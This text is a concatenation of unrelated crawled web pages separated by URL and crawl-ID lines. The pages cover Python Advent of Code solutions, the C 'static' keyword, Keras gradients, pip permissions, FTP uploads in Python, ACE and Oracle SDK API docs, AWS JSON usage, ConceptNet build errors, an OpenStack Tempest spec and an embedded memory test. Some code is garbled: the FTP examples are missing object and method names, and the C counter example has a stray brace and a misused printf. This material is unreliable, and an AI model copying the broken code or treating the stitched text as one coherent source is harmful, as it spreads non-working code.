int(bp.translate(BP2BINARY), base=2) for bp in puzzle_input.split("\n") ] You set up the translation table between boarding pass strings and binary numbers. Then you use .translate() to translate each boarding pass in your input to a binary number and int() to convert the binary number to a seat ID. Finding the highest seat ID is now straightforward: def part1(data): """Solve part 1""" return max(data) Python’s built-in max() finds the highest value in a list. You can now run your tests to confirm that your solution works and then run your code against your personalized input to get your answer to the puzzle. Time to move on to the second part of the puzzle. Will you be able to board the plane? Part 2: Puzzle Description Expand the section below when you’re ready for the second part of the puzzle: Compared to the first part, the description of part two is quite short and concise: Ding! The “fasten seat belt” signs have turned on. Time to find. What is the ID of your seat? Can you find your seat? Take your time and work on your solution to this second part. Part 2: Solution Open the box below when you’re ready to compare your solution to another one: In this second part of the puzzle, you’re looking for one missing number in a list of numbers. There are several ways you can approach this. You can, for example, sort all the numbers and compare consecutive items in your sorted list. Another option is to use Python’s powerful sets. You can first create the full set of valid seat IDs. Then you can calculate the set difference between this full set and the set of seat IDs on your list. Before you start on the implementation, though, you should add a test for it. In this case, the example data are actually not good to use for a test. They have many seat IDs missing and not only one like the puzzle text specifies. You’re better off creating a small test manually. Here’s one way you can do it: def test_part2(): """Test part 2 on example input""" data = [3, 9, 4, 8, 5, 10, 7, 11] assert aoc.part2(data) == 6 The list [3, 9, 4, 8, 5, 10, 7, 11] contains all seat IDs from 3 and 11 with the exception of 6. This smaller example fulfills the conditions of the puzzle. Your solution should therefore be able to pick out the missing seat ID. In this implementation, you’ll use the set() approach: 1def part2(data): 2 """Solve part 2""" 3 all_ids = set(range(min(data), max(data) + 1)) 4 return (all_ids - set(data)).pop() On line 3, you create all the valid seat IDs. These are the numbers between the smallest seat ID and highest seat ID in your dataset, inclusive. To find your seat ID, you convert your list of seat IDs to a set, compare it to the set of all IDs, and pop out the one remaining seat ID. Congratulations! By now, you’ve solved at least two Advent of Code puzzles. Luckily, there are hundreds more waiting for you! Conclusion Advent of Code is a great resource of fun programming puzzles! You can use it to practice your problem-solving skills and challenge your friends to a fun competition and common learning experience. If you haven’t already done so, then head over to the Advent of Code website and try out some of the new puzzles. In this tutorial, you learned: - How solving puzzles can advance your programming skills - How you can participate in Advent of Code - How you can approach different kinds of puzzles - How you can organize your code and tests when solving Advent of Code puzzles - How test-driven development can be used when solving puzzles Real Python hosts a private leaderboard and a community forum about Advent of Code. Become a Real Python member and join the #advent-of-code Slack channel to access it.
https://statsidea.com/advent-of-code-solving-your-puzzles-with-python/
CC-MAIN-2022-40
en
refinedweb
The staic keyword in C language is very simple, so simple that you can not write a staic keyword in any project. Writing this chapter is mainly about my understanding and application of staic. Of course, at the beginning of the chapter, I still need to briefly describe the static keyword according to the book. 1. Brief description Static keyword is very simple in embedded C language. It has three functions: Function 1: in the function body, a variable declared as static maintains its value during the call of this function. void test1(void) { unsigned char a; static unsigned char b; … a++; b++; } In this example, variable a is a local variable and variable B is a local static variable. Function 1 describes the characteristics of local static variable B: in the function body, a variable declared as static (that is, a local static variable) maintains its value during the call of this function. At this time, the effect is the same as that of the global variable. In the following simple example, declare a local variable of the function and set it as static type as a counter, so that the function can be counted every time it is called. This statistical method is very good, because other functions can modify this variable (except for the program running and flying). void count(); int main() { int i; for (i = 1; i <= 3; i++) { count(); { return 0; } void count() { static num = 0; num++; printf(" I have been called %d",num,"times/n"); } The output result is: I have been called 1 times. I have been called 2 times. I have been called 3 times. Here are two points to note: The effect of local static quantity is still changed and still valid within the number The storage location of local static variables becomes memory and is no longer stored in the stack On the storage of local static variables, students who don’t understand it move to the previous chapter《Memory allocation of C language in stm32》。 Function 2: in the module (but outside the function), a variable declared as static can be accessed by the function used in the module, but cannot be accessed by other functions outside the module. It is a local global variable. Variables defined in this way are also called global static variables: add the keyword static before the global variable, and the global variable is defined as a global static variable. That is, the static variables declared in the module (but outside the function) mentioned in function 2 above. Benefits of defining global static variables: Its scope is only in this file and will not be accessed or modified by other files. It is a local variable. Variables with the same name can be used in other files without conflict. Function 3: in a module, a function declared as static can only be called by other functions in this module. That is, this function is restricted to the local scope of the module that declares it. The function defined in this way also becomes a static function: add the keyword static before the return type of the function, and the function is defined as a static function. Benefits of defining static functions: Functions with the same name can be defined in other files without conflict Static functions cannot be used by other files. It defines a local function. 2. Talk more As mentioned above, the static keyword is very simple, which is basically for code modularization. For quite a period of time, I didn’t use the static keyword in my work. In the code of MCU, generally one person can manage the whole code project, so I didn’t use the static keyword a lot. In previous articles《STM32 “hidden timer” -dwt》The code for measuring the running time of the code is as follows: float DTW_Time_Difference_ms(void) { static uint32_t old_counter; uint32_t counter,couter_current; couter_current = DWT_TS_GET(); if(couter_current > old_counter) counter = couter_current - old_counter; else counter = couter_current + 0XFFFFFFFF - old_counter; old_counter = couter_current; return (counter / (SystemCoreClock/1000)); } Using the static keyword, I also realized the benefits of using the static keyword, which is good for function encapsulation. When you need to encapsulate a function function to the extent that you can use it by directly copying it, you need a full variable at this time, and a static local variable in the function at this time. Everyone who reads the article, if you have the wonderful use of static keyword, please leave a message in the comment area! Click to view the album of this article:Advanced C language
https://developpaper.com/detailed-explanation-of-static-keyword-in-c-language/
CC-MAIN-2022-40
en
refinedweb
Each Answer to this Q is separated by one/two green lines. I am interested in building reinforcement learning models with the simplicity of the Keras API. Unfortunately, I am unable to extract the gradient of the output (not error) with respect to the weights. I found the following code that performs a similar function (Saliency maps of neural networks (using Keras)) get_output = theano.function([model.layers[0].input],model.layers[-1].output,allow_input_downcast=True) fx = theano.function([model.layers[0].input] ,T.jacobian(model.layers[-1].output.flatten(),model.layers[0].input), allow_input_downcast=True) grad = fx([trainingData]) Any ideas on how to calculate the gradient of the model output with respect to the weights for each layer would be appreciated. To get the gradients of model output with respect to weights using Keras you have to use the Keras backend module. I created this simple example to illustrate exactly what to do: from keras.models import Sequential from keras.layers import Dense, Activation from keras import backend as k model = Sequential() model.add(Dense(12, input_dim=8, init="uniform", activation='relu')) model.add(Dense(8, init="uniform", activation='relu')) model.add(Dense(1, init="uniform", activation='sigmoid')) model.compile(loss="binary_crossentropy", optimizer="adam", metrics=['accuracy']) To calculate the gradients we first need to find the output tensor. For the output of the model (what my initial question asked) we simply call model.output. We can also find the gradients of outputs for other layers by calling model.layers[index].output outputTensor = model.output #Or model.layers[index].output Then we need to choose the variables that are in respect to the gradient. listOfVariableTensors = model.trainable_weights #or variableTensors = model.trainable_weights[0] We can now calculate the gradients. It is as easy as the following: gradients = k.gradients(outputTensor, listOfVariableTensors) To actually run the gradients given an input, we need to use a bit of Tensorflow. trainingExample = np.random.random((1,8)) sess = tf.InteractiveSession() sess.run(tf.initialize_all_variables()) evaluated_gradients = sess.run(gradients,feed_dict={model.input:trainingExample}) And thats it! The below answer is with the cross entropy function, feel free to change it your function. outputTensor = model.output listOfVariableTensors = model.trainable_weights bce = keras.losses.BinaryCrossentropy() loss = bce(outputTensor, labels) gradients = k.gradients(loss, listOfVariableTensors) sess = tf.InteractiveSession() sess.run(tf.global_variables_initializer()) evaluated_gradients = sess.run(gradients,feed_dict={model.input:training_data1}) print(evaluated_gradients)
https://techstalking.com/programming/python/getting-gradient-of-model-output-w-r-t-weights-using-keras/
CC-MAIN-2022-40
en
refinedweb
Each Answer to this Q is separated by one/two green lines. I was playing around with iterables and more specifically the yield operator in Python. While using test driven development to start writing a new iterable, I wondered what is the shortest code that could make this simple test for an iterable to pass: def test(): for x in my_iterable(): pass The shortest version I could think of was: def my_iterable(): for i in []: yield i Is it possible to write a simpler, shorter or more beautiful (pythonic) version? Yes, there is: return iter([]) Another solution, in Python 3, is to use the new yield from syntax: def empty_gen(): yield from () Which is readable, and keep empty_gen as a generator. You can use the lambda and iter functions to create an empty iterable in Python. my_iterable = lambda: iter(()) How about my_iterable = str this passes your test. To speak seriously, Iterable in the collections module provides: def __iter__(self): while False: yield None This can be considered “most pythonic” because this is what python itself uses. Note that technically all answers so far provide iterators ( __iter__ + next), not iterables (just __iter__). def do_yield(): return yield None if usage of yield is important for you, one of the other answers otherwise. Another answer, as I provide a completely new solution with a different approach. In one of by libraries, I have an EmptyIterator such as class EmptyIter(object): __name__ = 'EmptyIter' """Iterable which is False and empty""" def __len__(self): return 0 def next(self): raise StopIteration # even that is redundant def __getitem__(self, index): raise IndexError It is an alternative approach which uses the following properties:
https://techstalking.com/programming/python/what-is-the-simplest-way-to-create-an-empty-iterable-using-yield-in-python/
CC-MAIN-2022-40
en
refinedweb
I have a new Macbook – a user installed it, and then I installed a new user (mine), granted admin privileges and deleted the old one. I am on OS Catalina. Since the installation I’ve been having several permission problems. VSCode can’t find Jupyter Notebook, pip installs packages at ~/Library/Python/3.7/site-packages. When I do which python3 I get usr/bin/python3. When I do pip3 install <package> I get: Defaulting to user installation because normal site-packages is not writeable And then it says it has already been installed, even though I can’t access it when I do import <package>. It’s seems clear that this is a permission problem, pip can’t install to the “base” python, and them python can’t find what I’ve installed into ~/Library/Python/3.7/site-packages. I’ve tried reinstalling the OS, but since I haven’t done a clean install, it didn’t change anything. What am I missing? How exactly can I fix permissions? Where do I want packages to be installed ( venv sure, but some packages I want global (like jupyter). Thanks Solution #1: As @TomdeGeus mentioned in the comments, this command works for me: python3 -m pip install [package_name] Solution #2: It’s best to not use the system-provided Python directly. Leave that one alone since the OS can change it in undesired ways, as you experienced. The best practice is to configure your own Python version(s) and manage them on a per-project basis using virtualenv (for Python 2) or venv (for Python 3). This eliminates all dependency on the system-provided Python version, and also isolates each project from other projects on the machine. Each project can have a different Python point version if needed, and gets its own site_packages directory so pip-installed libraries can also have different versions by project. This approach is a major problem-avoider. Solution #3: python3.7 -m pip install [package_name] solved it for me. The most voted answer python3 -m pip install [package_name] does not help me here. In my case, this was caused by a conflict with the dominating 3.6 version that was also installed. Here is a proof by example --upgrade pip: pip3 install --upgrade pip Defaulting to user installation because normal site-packages is not writeable Requirement already satisfied: pip in /home/USERNAME/.local/lib/python3.6/site-packages (20.3.1) python3 -m pip install --upgrade pip Defaulting to user installation because normal site-packages is not writeable Requirement already satisfied: pip in /home/USERNAME/.local/lib/python3.6/site-packages (20.3.1) python3.7 -m pip install --upgrade pip Collecting pip Cache entry deserialization failed, entry ignored Using cached Installing collected packages: pip Successfully installed pip-20.3.1 Solution #4: I had the Same issue with Jetson Nano, Used Sudo and it worked So try sudo with pip. Solution #5: It occurs with me when I the virtual enviroment folder name was : venv. in this case, It gives errors like : No module pip Default folder is unwritable renaming the folder solve the proplem. Solution #6: Had this same issue on a fresh install of Debian 9.12. Rebooting my server solved the issue. Solution #7: in my case python3 -m pip install [package_name] did not solve that. in my case, it was a problem related to other processes occupying the directory. I restart Pycharm and close any other program that might occupy this folder, and reinstalled the package in site-packages directory successfully.
https://techstalking.com/programming/question/solved-pip-python-normal-site-packages-is-not-writeable/
CC-MAIN-2022-40
en
refinedweb
Overview TODO: Write introduction. Goal is to build a cross compiler targeting pdp11-aout. TODO: What kind of joint header do I want across all the articles in a set, linking them together? This document guides you through building a cross compiler using GCC on FreeBSD. This cross compiler will run on a modern AMD64 machine but emit code which runs on a DEC PDP-11. In addition to the compiler, these instructions also build associated tooling like an assembler, linker, etc. In this manner, modern programming tools like make, git, vi, and more can be used to write modern C in your usual style while targeting the PDP-11. Installation These instructions were tested on FreeBSD 12 with GCC 7.3.0 from ports as the host compiler. The cross compiler was built from the GCC 10.2.0 and Binutils 2.35.1 source code. Building GCC requires GNU Make. On FreeBSD either install via pkg install gmake or build from ports under devel/gmake. On Linux your make command is probably gmake in disguise. Run make --version and see if the first line is something like GNU Make 4.2.1. In addition to GCC, we will also need to compile GNU Binutils since it contains the assembler, linker, and other necessary tools. Obtain suitable source code tarballs from these links. I like to build all my cross compilers under one folder in my home directory, each with a version specific sub-folder. setenv PREFIX "$HOME/cross-compiler/pdp11-gcc10.2.0" Remember to make any $PATH changes permanent. For tcsh on FreeBSD, this means editing ~/.cshrc. To set the $PATH for this session, execute the following. setenv PATH "$PREFIX/bin:$PATH" The $TARGET environment variable is critical as it tells GCC what kind of cross compiler we desire. In our case, this target triplet is requesting code for the PDP-11 architecture, wrapped in an a.out container, with no hosted environment. That means this is a bare-metal target. There will be no C standard library, only the C language itself. setenv TARGET pdp11-aout Both GCC and binutils are best built from outside the source tree. Make two directories to hold the build detritus. Use a clean build directory each time you reconfigure or rebuild. cd $HOME/cross-compiler/pdp11-gcc10.2.0 mkdir workdir-binutils mkdir workdir-gcc Build binutils first. Assuming you saved the source code in ~/cross-compiler/pdp11-gcc10.2.0/, simply do the following. cd $HOME/cross-compiler/pdp11-gcc10.2.0 tar xzf binutils-2.35.1.tar.gz cd workdir-binutils Now configure, build and install binutils. ../binutils-2.35.1/configure --target=$TARGET --prefix="$PREFIX" \ --with-sysroot --disable-nls --disable-werror gmake gmake install Verify that you can access a series of files in your $PATH named pdp11-aout-* (e.g. pdp11-aout-as), and that checking their version with pdp11-aout-as --version results in something like GNU Binutils 2.35.1. With binutils built and installed, now it’s time to build GCC. Follow a similar process to unpack the source code, but note the new requirement to download dependencies. In older versions of GCC this command was ./contrib/download-dependencies instead of ./contrib/download-prerequisites. cd $HOME/cross-compiler/pdp11-gcc10.2.0 tar xzf gcc-10.2.0.tar.gz cd gcc-10.2.0 ./contrib/download-prerequisites cd ../workdir-gcc Configuring GCC proceeds similarly to binutils. Both GNU as and GNU ld are part of binutils, hence the directive informing GCC to use them. ../gcc-10.2.0/configure --target=$TARGET --prefix="$PREFIX" \ --disable-nls --enable-languages=c --without-headers \ --with-gnu-as --with-gnu-ld --disable-libssp gmake all-gcc gmake install-gcc Verify that pdp11-aout-gcc --version from your $PATH reports something like pdp11-aout-gcc 10.2.0. That’s it, you’re done. You now have a cross compiler that will run on your workstation and output PDP-11 compatible binaries in a.out format. At this point you can skip ahead to the next section or continue reading about some potential pitfalls of the cross compiler we’ve just built. Potential Pitfalls Below are a few problems I ran into while using my cross compiler, some of which may apply when compiling your own code for the PDP-11. I hope that by mentioning the problems here, along with symptoms and workarounds, you might be saved some time when encountering them. Compiling libgcc Our newly built cross compiler expects libgcc to exist at link time, but we didn’t build it. So what is libgcc anyway? Quoting from the GCC manual:. Why didn’t we build libgcc? Because we encountered this error Problem Consider the following C code which performs division and modulus operations on 16-bit unsigned integers. #include "pdp11.h" #include <stdint.h> uint16_t a=8, b=64; printf("b \% a = %o\n", b % a); printf("b / a = %o\n", b / a); If we try to compile this code, we receive two errors from the linker. pdp11-aout-ld: example.o:example.o:(.text+0x8e): undefined reference to `__umodhi3' pdp11-aout-ld: example.o:example.o:(.text+0xac): undefined reference to `__udivhi3' The two functions referenced, __umodhi3 and __udivhi3 are part of libgcc. The names reference the unsigned modulo or division on half-integer types. Per the GCC manual, the half-integer mode uses a two-byte integer. Solution There are two ways around this problem. The first (and superior) option is figuring out how to build libgcc. The command to initiate the build is gmake all-target-libgcc, executed under the same environment in which gmake all-gcc was executed earlier in this guide. If you figure out what I’m doing wrong, let me know. The second option is to implement your own functions for __umodhi3(), __udivhi3(), and whatever else might come up. It’s not hard to make something functional, though catching all the edge cases could be challenging. Using uint32 Although the PDP-11 utilizes a 16-bit word, GCC is clever enough to allow operations on 32-bit words by breaking them up into smaller operations. For example, in the following assembly code generated by GCC, note how the 32-bit word is pushed onto the stack as two separate words. uint32_t a=0710004010 uint16_t a=010; add $-4, sp add $-2, sp mov $3440, (sp) mov $10, (sp) mov $4010, 2(sp) Problem Whenever I try to make real use of code with uint32_t, I encounter internal compiler errors like the following. memtest.c:119:1: error: insn does not satisfy its constraints: } ^ (insn 95 44 45 (set (reg:HI 1 r1) (reg/f:HI 16 virtual-incoming-args)) "memtest.c":114 14 {movhi} (nil)) memtest.c:119:1: internal compiler error: in extract_constrain_insn_cached, at recog.c:2225 no stack trace because unwind library not available Please submit a full bug report, with preprocessed source if appropriate. See <> for instructions. *** Error code 1 In each case, adding a single uint32_t operation in one spot in the code resulted in a compiler error in a completely different part of the code. Removing the offending uint32_t line caused the program to again compile and execute normally. In each case, I already had uint32_t related code working elsewhere in the program. Solution Until I track down the bug causing these errors, I’ve been using structs containing pairs of uint16_t words and writing helper functions to perform operations on them. GNU Assembler Bug If you’re stuck using an older version of GNU binutils, as I was while cross compiling from a SPARCstation 20, there is a bug in the GNU assembler that crops up whenever double-indirection is used in GCC. It was present until at least GNU Binutil 2.28 but appears to be fixed no later than 2.32 per the following code snippet in binutils-2.32/gas/config/tc-pdp11.c. if (*str == '@' || *str == '*') { /* @(Rn) == @0(Rn): Mode 7, Indexed deferred. Check for auto-increment deferred. */ if ( ... Problem compiles this to assembly it generates code of the form @(Rn) when assigning a value to **csp thus causing the value 0 to overwrite the value 060000 at *csp if GNU as is used to assemble the code. Solution The following patch, tested on GNU binutils 2.28, fixes the bug. It’s a little hacky since it overloads the operand->code variable to pass unrelated state information to parse_reg(). ---;
https://www.subgeniuskitty.com/development/pdp-11/modern_c_software_development/pdp11-cross-compiler
CC-MAIN-2022-40
en
refinedweb
Quantum Computing Service The platform enabling researchers to access beyond-classical computational resources Our quantum computing service provides chaperoned access to NISQ processors and our simulator for researchers who aim to advance the state-of-the-art in quantum computing and publicly share their results in algorithms, applications, tools, and processor characterizations. import cirq import sympy sampler = cirq.google.get_engine_sampler( project_id=PROJECT_ID, processor_id=PROCESSOR_ID, gate_set_name='sqrt_iswap') circuit = cirq.Circuit( cirq.XPowGate(exponent=sympy.Symbol('t'))(cirq.GridQubit(5,4)), cirq.measure(cirq.GridQubit(5,4), key='meas')) rabi_sweep = cirq.Linspace('t', start=0, stop=1, length=20) results = sampler.run_sweep(circuit, repetitions=1000,params=rabi_sweep) for t in range(20): print(results[t].histogram(key='meas')) Early Access Sycamore via our Quantum Engine API, and user feedback will improve the service. We are currently collaborating with a group of early access partners and will welcome new applications in 2021..
https://quantumai.google/quantum-computing-service?hl=nl
CC-MAIN-2022-40
en
refinedweb
Python – Uploading Data We can upload data to a serer using python’s module which handle ftp or File Transfer Protocol. We need to install the module ftplib to acheive this. pip install ftplib Using ftplib In the below example we use FTP method to connect to the server and then supply the user credentials. Next we mention the name of the file and the storbinary method to send and store the file in the server. import ftplib ftp = ftplib.FTP("127.0.0.1")("username", "password") file = open('index.html','rb')("STOR " + file, open(file, "rb")) file.close() When we run the above program, we observer that a copy of the file has been created in the server. Using ftpreety Similar to ftplib we can use ftpreety to connect securely to a remote server and upload file. We can aslo download file using ftpreety. The below program illustraits the same. from ftpretty import ftpretty # Mention the host host = "127.0.0.1" # Supply the credentisals f = ftpretty(host, user, pass ) # Get a file, save it locally f.get('someremote/file/on/server.txt', '/tmp/localcopy/server.txt') # Put a local file to a remote location # non-existent subdirectories will be created automatically f.put('/tmp/localcopy/data.txt', 'someremote/file/on/server.txt') When we run the above program, we observer that a copy of the file has been created in the server.
https://scanftree.com/tutorial/python/python-network-programming/python-uploading-data/
CC-MAIN-2022-40
en
refinedweb
#include <QoS_Decorator.h> #include <QoS_Decorator.h> Inheritance diagram for ACE_QoS_Decorator: Decorates the ACE_Event_Handler to additionally handle QoS events uniformly for different QoS mechanisms like RAPI and GQoS. Constructor. ACE_Reactor::instance() Destructor. [virtual] Calls the base class get_handle (). Reimplemented from ACE_QoS_Decorator_Base. Calls the base class handle_input (). Calls the base class handle_qos (). This method registers the QoS Event Handler with the Reactor to receive RAPI events. [private] Requests on the class are forwarded to this base class;. Handles the QoS events and in that sense decorates the usual ACE_Event_Handler. Passed to the ACE_QoS_Event_Handler for retrieving the RAPI session specific information like rapi_fd. If the application wants to use an instance of Reactor other than the Singleton one. Reimplemented from ACE_Event_Handler.
https://www.dre.vanderbilt.edu/Doxygen/5.5/html/ace/QoS/classACE__QoS__Decorator.html
CC-MAIN-2022-40
en
refinedweb
@Generated(value="OracleSDKGenerator", comments="API Version: 20200131") public class ListSightingsRequest extends BmcRequest<Void> getBody$, getInvocationCallback, getRetryConfiguration, setInvocationCallback, setRetryConfiguration, supportsExpect100Continue clone, finalize, getClass, notify, notifyAll, wait, wait, wait public ListSightingsRequest() public String getCompartmentId() The ID of the compartment in which to list resources. public String getProblemId() OCID of the problem. public String getResourceProfileId() OCID of the resource profile. public Boolean getCompartmentIdInSubtree() Default is false. When set to true, the hierarchy of compartments is traversed and all compartments and subcompartments in the tenancy are returned depending on the the setting of accessLevel. public ListSight ListSightingsRequest.SortBy getSortBy() The field to sort by. Only one sort order may be provided. Default order for timeCreated is descending. If no value is specified timeCreated is String getOpcRequestId() The client request ID for tracing. public ListSightingsRequest.Builder toBuilder() Return an instance of ListSightingsRequest.Builder that allows you to modify request properties. ListSightingsRequest.Builderthat allows you to modify request properties. public static ListSight>
https://docs.oracle.com/en-us/iaas/tools/java/2.44.0/com/oracle/bmc/cloudguard/requests/ListSightingsRequest.html
CC-MAIN-2022-40
en
refinedweb
JSON JSON is a format for data exchange that is both human-readable and machine-readable. Although the name JSON is an acronym for JavaScript Object Notation, the format of JSON is independent of any programming language. The Amazon SDK for JavaScript uses JSON to send data to service objects when making requests and receives data from service objects as JSON. For more information about JSON, see json.org JSON represents data in two ways: As an object, which is an unordered collection of name-value pairs. An object is defined within left ( {) and right ( }) braces. Each name-value pair begins with the name, followed by a colon, followed by the value. Name-value pairs are comma separated. As an array, which is an ordered collection of values. An array is defined within left ( [) and right ( ]) brackets. Items in the array are comma separated. Here is an example of a JSON object that contains an array of objects in which the objects represent cards in a card game. Each card is defined by two name-value pairs, one that specifies a unique value to identify that card and another that specifies a URL that points to the corresponding card image. var cards = [ {"CardID":"defaultname", "Image":"defaulturl"}, {"CardID":"defaultname", "Image":"defaulturl"}, {"CardID":"defaultname", "Image":"defaulturl"}, {"CardID":"defaultname", "Image":"defaulturl"}, {"CardID":"defaultname", "Image":"defaulturl"} ]; JSON as service object parameters Here is an example of simple JSON used to define the parameters of a call to an Amazon Lambda service object. const params = { FunctionName : "slotPull", InvocationType : "RequestResponse", LogType : "None" }; The params object is defined by three name-value pairs, separated by commas within the left and right braces. When providing parameters to a service object method call, the names are determined by the parameter names for the service object method you plan to call. When invoking a Lambda function, FunctionName, InvocationType, and LogType are the parameters used to call the invoke method on a Lambda service object. When passing parameters to a service object method call, provide the JSON object to the method call, as shown in the following example of invoking a Lambda function. import { LambdaClient, InvokeCommand } from "@aws-sdk/client-lambda"; (async function() { const lambdaClient = new LambdaClient({ region: "us-west-2" }); // create JSON object for service call parameters const params = { FunctionName : "slotPull", InvocationType : "RequestResponse", LogType : "None" }; // create InvokeCommand command const command = new InvokeCommand(params); // invoke Lambda function try { const response = await lambdaClient.send(command); console.log(response); } catch (err) { console.err(err); } })();
https://docs.amazonaws.cn/en_us/sdk-for-javascript/v3/developer-guide/working-with-json.html
CC-MAIN-2022-40
en
refinedweb
this a known issue? Hi, a newbie here. I tried to run "snakemake data/vectors/mini.h5" and received this error: File "/home/bancherd/.local/lib/python3.8/site-packages/wordfreq/tokens.py", line 264, in tokenize tokens = _mecab_tokenize(text, language.language) File "/home/bancherd/.local/lib/python3.8/site-packages/wordfreq/mecab.py", line 40, in mecab_tokenize MECAB_ANALYZERS[lang] = make_mecab_analyzer(lang) File "/home/bancherd/.local/lib/python3.8/site-packages/wordfreq/mecab.py", line 20, in make_mecab_analyzer import ipadic ModuleNotFoundError: No module named 'ipadic' [Sun Aug 22 17:01:09 2021] Error in rule miniaturize: jobid: 0 output: data/vectors/mini.h5 shell: cn5-vectors miniaturize data/vectors/numberbatch-biased.h5 data/vectors/w2v-google-news.h5 data/vectors/mini.h5 (exited with non-zero exit code) I tried to look for "ipadic", without success. Can anyone suggest solutions? Thank you! Inspite of the warning in pypi, I went ahead , installed "ipadic" and rerun the script: got the following(different) error:Building prefix dict from /home/bancherd/.local/lib/python3.8/site-packages/wordfreq/data/jieba_zh.txt ... Dumping model to file cache /tmp/jieba.u600b79f75cbc9b33aa477293be70c0e2.cache Prefix dict has been built successfully. /usr/bin/bash: line 1: 37532 Killed cn5-vectors miniaturize data/vectors/numberbatch-biased.h5 data/vectors/w2v-google-news.h5 data/vectors/mini.h5 [Sun Aug 22 20:16:41 2021] Error in rule miniaturize: jobid: 0 output: data/vectors/mini.h5 shell: Hi all, I'm also building ConceptNet5 for the first time on a machine running Ubuntu 20.04 with 32 GB of RAM. I was able to run ./build.sh without any obvious errors that I saw in the output, but pytest is returning failed and skipped tests. Specifically: test_languages.py fails (316), error message indicates it is unable to find the language_data module (traced to line 809 in .../langcodes/init.py). test_json_ld.py fails as well with a KeyError on line 82 (which is: "quiz = ld[api('/c/en/quiz')]") and line 161 ("rel = ld[vocab('rel')]) Do these errors indicate that the installation was not successful and I should re-install? Or, have others encountered the same issues and have solutions? I did check the documentation and Googled the errors, but did not find any relevant troubleshooting solutions. Any suggestions would be appreciated. Hi i want build conceptnet node. But when i run build.sh i get this error Error in rule convert_opensubtitles_ft: jobid: 0 output: data/vectors/fasttext-opensubtitles.h5 RuleException: CalledProcessError in line 663 of /home/zb/Desktop/conceptnet/Snakefile: Command 'set -euo pipefail; CONCEPTNET_DATA=data cn5-vectors convert_fasttext -n 2000000 data/raw/vectors/ft-opensubtitles.vec.gz data/vectors/fasttext-opensubtitles.h5' returned non-zero exit status 137. File "/home/zb/Desktop/conceptnet/Snakefile", line 663, in __rule_convert_opensubtitles_ft File "/usr/lib/python3.8/concurrent/futures/thread.py", line 57, in run Exiting because a job execution failed. Look above for error message [Sat Sep 11 19:11:39 2021] Finished job 206. 371 of 472 steps (79%) done Shutting down, this might take some time. Exiting because a job execution failed. Look above for error message Complete log: /home/zb/Desktop/conceptnet/.snakemake/log/2021-09-11T182112.270477.snakemake.log What could be the reason for this? How can I proceed with the installation instead of starting over? I have. 300 GB of free disk space At least 30 GB of available RAM The time and bandwidth to download 24 GB of raw data I start build.sh and on 464 of 472 steps (98%) done I getting error. /usr/bin/bash: line 1: 22394 Killed [Mon Sep 13 03:26:07 2021] Error in rule merge_intersect: jobid: 177 output: data/vectors/numberbatch-retrofitted.h5, data/vectors/intersection-projection.h5 shell: (exited with non-zero exit code) Removing temporary output file data/psql/edges_gin.csv. [Mon Sep 13 03:27:40 2021] Finished job 3. 464 of 472 steps (98%) done Shutting down, this might take some time. Exiting because a job execution failed. Look above for error message Complete log: /home/zb/Desktop/conceptnet5/.snakemake/log/2021-09-12T221420.189372.snakemake.log Hi()
https://gitter.im/commonsense/conceptnet5?at=61952a29f4ced9438ed1d918
CC-MAIN-2022-40
en
refinedweb
Make service clients not to truncate response and move those to tempest-lib Service clients are Tempest own REST clients for operating each OpenStack project’s APIs. And we have a plan to migrate service clients’ methods to tempest-lib. 1. Currently these method cut out the top key from response like: def show_host_detail(self, hostname): """Show detail information for the host.""" resp, body = self.get("os-hosts/%s" % str(hostname)) body = json.loads(body) self.validate_response(schema.show_host_detail, resp, body) return service_client.ResponseBodyList(resp, body['host']) However this cutting is wrong as library function, because the caller cannot know the complete response returned from corresponding APIs. One example is resource links which are currently truncated by service clients. So if caller needs to use those resource links, they can not get from current service clients. 2. Currently JSON schemas which are used to validate the response in service clients are present in Tempest. When service clients will be migrated to Tempest-lib, those schemas should be accessible for service clients in Tempest-lib. def show_host_detail(self, hostname): """Show detail information for the host.""" resp, body = self.get("os-hosts/%s" % str(hostname)) body = json.loads(body) self.validate_response(schema.show_host_detail, resp, body) - return service_client.ResponseBodyList(resp, body['host']) + return service_client.ResponseBodyList(resp, body) Move JSON Response Schema to Tempest-lib Currently Tempest have JSON response schema in ‘tempest/api_schema’ which are used in service clients to validate API response. During Vancouver summit, it was decided that for short term solution we can move those schema in Tempest-lib along with service clients. In long term, each project should provide some way to get those schema through API or something else. Copy the service client code to tempest-lib repository Switch Tempest to use the service client code of tempest-lib Migration of service clients can be done gradually with one client class at a time. Primary assignee: Other contributors: Except where otherwise noted, this document is licensed under Creative Commons Attribution 3.0 License. See all OpenStack Legal Documents.
http://specs.openstack.org/openstack/qa-specs/specs/tempest/implemented/method-return-value-and-move-service-clients-to-lib.html
CC-MAIN-2018-43
en
refinedweb
Dear friends of the Freescale Forum, Although I am grateful for the intelligent tools that Freescale has developed for compiling very efficient code, sometimes I am frustrated when the intelligence prevents me from executing redundant tasks like testing my static ram array attched to the mini-flex bus. During the development stage I discovered that if compiling under global optimization of 4 the intelligence would prevent me from taking a value, writing to memory and reading it back again. It would ignore the code altogether because I guess it felt it was reduntant. To circumvent the intelligence I wrote the following code: uint_16 test_memory(void){ mem_slct[0] = (uint_8 *)0x100ffff0 ; mem_slct[1] = (uint_8 *)0x101ffff2 ; mem_slct[2] = (uint_8 *)0x102ffff4 ; mem_slct[3] = (uint_8 *)0x103ffff6 ; mem_slct[4] = (uint_8 *)0x104ffff7 ; mem_slct[5] = (uint_8 *)0x105ffffa ; mem_slct[6] = (uint_8 *)0x100ffffc ; mem_slct[7] = (uint_8 *)0x107ffffe ; for(num_chips = 0;num_chips < 8; num_chips ++ ) { mem_pointer = mem_slct[num_chips]; select_ram_page(mem_pointer); old_memory[num_chips] = *mem_pointer; mem_pointer++; test_data = *mem_pointer; mem_pointer --; *mem_pointer =0x55; test_data = *mem_pointer; *mem_pointer = old_memory[num_chips]; if( test_data != 0x55 ) break; } select_ram_page(0); return (num_chips); } I used global variables so that I could view the results in the IDE. I had to actually use the mem_pointer so that it wouldn't be optimized out of use. During our first production run of a 52259 based product we ran into defects where address and data lines were disconnected. Sometimes a defect of this nature can go undetected if the memory location affected isn't reached. I now need to come up with a full memory test (not just a few locations) that will be able to indicate when a defect is discovered. I will post my code when finished but I am open to suggestions. Thanks Maybe this will help:
https://community.nxp.com/thread/77618
CC-MAIN-2018-43
en
refinedweb
